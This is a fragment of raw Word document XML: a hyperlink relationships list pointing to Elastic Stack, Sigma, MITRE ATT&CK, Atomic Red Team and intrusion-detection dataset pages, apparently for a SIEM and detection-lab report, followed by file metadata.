Target="https://github.com/SigmaHQ/sigma/wiki/Tools" TargetMode="External"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://mawi.wide.ad.jp/mawi/?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/othneildrew/Best-README-Template" TargetMode="External"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/guide/en/elasticsearch/reference/current/security-settings.html" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.atomicredteam.io/?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/new" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/guide/en/logstash/current/index.html" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/guide/en/beats/auditbeat/current/auditbeat-installation.html" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/guide/en/elastic-stack/current/index.html" TargetMode="External"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/guide/en/logstash/current/filter-plugins.html" TargetMode="External"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/guide/en/kibana/current/index.html" TargetMode="External"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/othneildrew/Best-README-Template" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/guide/en/ecs/current/ecs-reference.html" TargetMode="External"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9200" TargetMode="External"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/elastic/detection-rules?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://mawi.wide.ad.jp/mawi/?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/redcanaryco/atomic-red-team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new" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/guide/en/elasticsearch/reference/current/configuring-tls.html" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/Invoke-AtomicTest" TargetMode="External"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/elastic/detection-rules?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/cowrie/cowrie?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/redcanaryco/atomic-red-team?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/guide/en/kibana/current/dashboard.html" TargetMode="External"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/guide/en/elasticsearch/reference/current/monitor-elasticsearch-cluster.html" TargetMode="External"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/guide/en/kibana/current/index.html" TargetMode="External"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/guide/en/elastic-stack-get-started/current/get-started-docker.html" TargetMode="External"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ieee.org/conferences/publishing/templates.html" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/redcanaryco/atomic-red-team?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ubuntu.com/download" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/guide/en/beats/filebeat/current/configuring-ssl-logstash.html" TargetMode="External"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/guide/en/logstash/current/plugins-filters-geoip.html" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/guide/en/elasticsearch/reference/current/heap-size.html" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-log.html" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/guide/en/logstash/current/plugins-filters-geoip.html" TargetMode="External"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/SigmaHQ/sigma?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/guide/en/kibana/current/getting-started.html" TargetMode="External"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/guide/en/elastic-stack-get-started/current/get-started-docker.html" TargetMode="External"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/guide/en/kibana/current/vega-graph.html" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ubuntu.com/download" TargetMode="External"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:5601" TargetMode="External"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/cowrie/cowrie?utm_source=chatgpt.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elastic.co/guide/en/elasticsearch/reference/current/modules-snapshots.html" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/guide/en/elasticsearch/reference/current/docker.html" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/guide/en/beats/filebeat/current/index.html" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.atomicredteam.io/?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/guide/en/elasticsearch/reference/current/index-lifecycle-management.html" TargetMode="External"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.unb.ca/cic/datasets/ids-2017.html?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/guide/en/elasticsearch/reference/current/security-settings.html" TargetMode="External"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/redcanaryco/atomic-red-team?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.suricata.io/?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/guide/en/kibana/current/kuery-query.html" TargetMode="External"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ieee.org/conferences/publishing/templates.html" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/en-us/evalcenter" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/deviantony/docker-elk?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-installation.html" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/guide/en/logstash/current/plugins-filters-translate.html" TargetMode="External"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/guide/en/elasticsearch/reference/current/snapshots-take-snapshot.html" TargetMode="External"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/cloud/" TargetMode="External"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/guide/en/elastic-stack-get-started/current/security-get-started.html" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/en-us/evalcenter" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/guide/en/logstash/current/plugins-inputs-file.html" TargetMode="External"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/guide/en/elastic-stack-get-started/current/get-started-docker.html" TargetMode="External"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/SigmaHQ/sigma?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/SwiftOnSecurity/sysmon-config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elastic.co/guide/en/elasticsearch/reference/current/deb.html" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/redcanaryco/atomic-red-team/tree/master/atomic/red-team" TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/guide/en/machine-learning/current/ml-overview.html" TargetMode="External"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.unb.ca/cic/datasets/ids-2017.html?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/deviantony/docker-elk?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/guide/en/beats/winlogbeat/current/index.html" TargetMode="External"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/guide/en/machine-learning/current/create-and-run-anomaly-detection-jobs.html" TargetMode="External"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/cloud/" TargetMode="External"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://csr.lanl.gov/data/auth/?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/?utm_source=chatgpt.com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s://www.elastic.co/guide/en/elasticsearch/reference/current/configuring-tls.html" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/downloads/beats/winlogbeat" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/guide/en/logstash/current/plugins-filters-grok.html" TargetMode="External"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/guide/en/cloud/current/ec-getting-started.html" TargetMode="External"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/guide/en/elasticsearch/reference/current/snapshots-take-snapshot.html" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/deviantony/docker-elk?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/guide/en/elasticsearch/reference/current/docker.html" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/guide/en/logstash/current/plugins-filters-geoip.html" TargetMode="External"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/guide/en/cloud/current/ec-getting-started.html" TargetMode="External"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/guide/en/elasticsearch/reference/current/modules-node.html" TargetMode="External"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/SwiftOnSecurity/sysmon-config" TargetMode="External"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/SigmaHQ/sigma/wiki/Tools" TargetMode="External"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/guide/en/elastic-stack/current/index.html" TargetMode="External"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/splunk/attack_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reference/current/docker.html" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/guide/en/logstash/current/installing-logstash.html" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/redcanaryco/atomic-red-team?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/guide/en/security/current/rules-api.html" TargetMode="External"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://research.unsw.edu.au/projects/unsw-nb15-dataset?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/SigmaHQ/sigma?utm_source=chatgpt.com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67</Pages>
  <Words>14622</Words>
  <Characters>83352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kumbharkajal577@gmail.com</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>kumbharkajal577@gmail.com</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-10-08T17:28:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-11T09:53:00Z</dcterms:modified>
</cp:coreProperties>
</file>